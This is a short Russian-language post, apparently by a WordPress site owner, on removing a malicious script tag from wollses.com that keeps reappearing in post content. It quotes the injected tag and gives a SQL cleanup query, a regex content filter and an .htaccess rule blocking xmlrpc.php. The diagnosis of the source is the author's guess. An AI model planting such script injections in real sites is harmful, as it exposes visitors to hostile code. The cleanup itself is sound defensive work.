virusЯ так и не понял откуда взялся и прописался вызов скрипта в таблице post_content, а так же надоело его вычищать с помощью запросов которые я приведу ниже, но я смог найти решение как его не показывать на сайте - это js скрипт и рассчитан он на срабатывание в браузере пользователя - мы его просто не будем показывать пользователю и злоумышленник возможно отстанет от нас если мы все это сделаем.

Заметил что скрипт

<script src="//wollses.com/steps"></script>

добавляется к первой ссылке в записи, если нету ссылок - к первому тегу форматирования (у себя наблюдаю что "взломщик" любит тег <strong>), если у вас контент без ссылок и оформления то добавляется просто в конец записи.

Просто удалив скрипт из базы запросом через phpmyadmin мы не спасёмся - он снова появится через некоторое время, странно что не помогает смена всех паролей, а значит бяка в плагине или теме (в сети грешат на плагин AddQuicktag и на файл xmlrpc.php).

UPDATE wp_posts
SET post_content = REPLACE (post_content, '<script src="//wollses.com/steps"></script>', '')

Для того чтоб просто не показывать код в вашем контенте просто добавим в файл functions.php несколько строк, в которых мы регулярным выражением удаляем ненужный нам код.

function delete_js_wollses($content){
return preg_replace("'<script.*wollses.com.*></script>'si", "", $content);
}
add_filter( 'the_content', 'delete_js_wollses', 10, 1 );

А чтоб заблокировать доступ к файлу xmlrpc.php нужно в .htaccess добавить

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>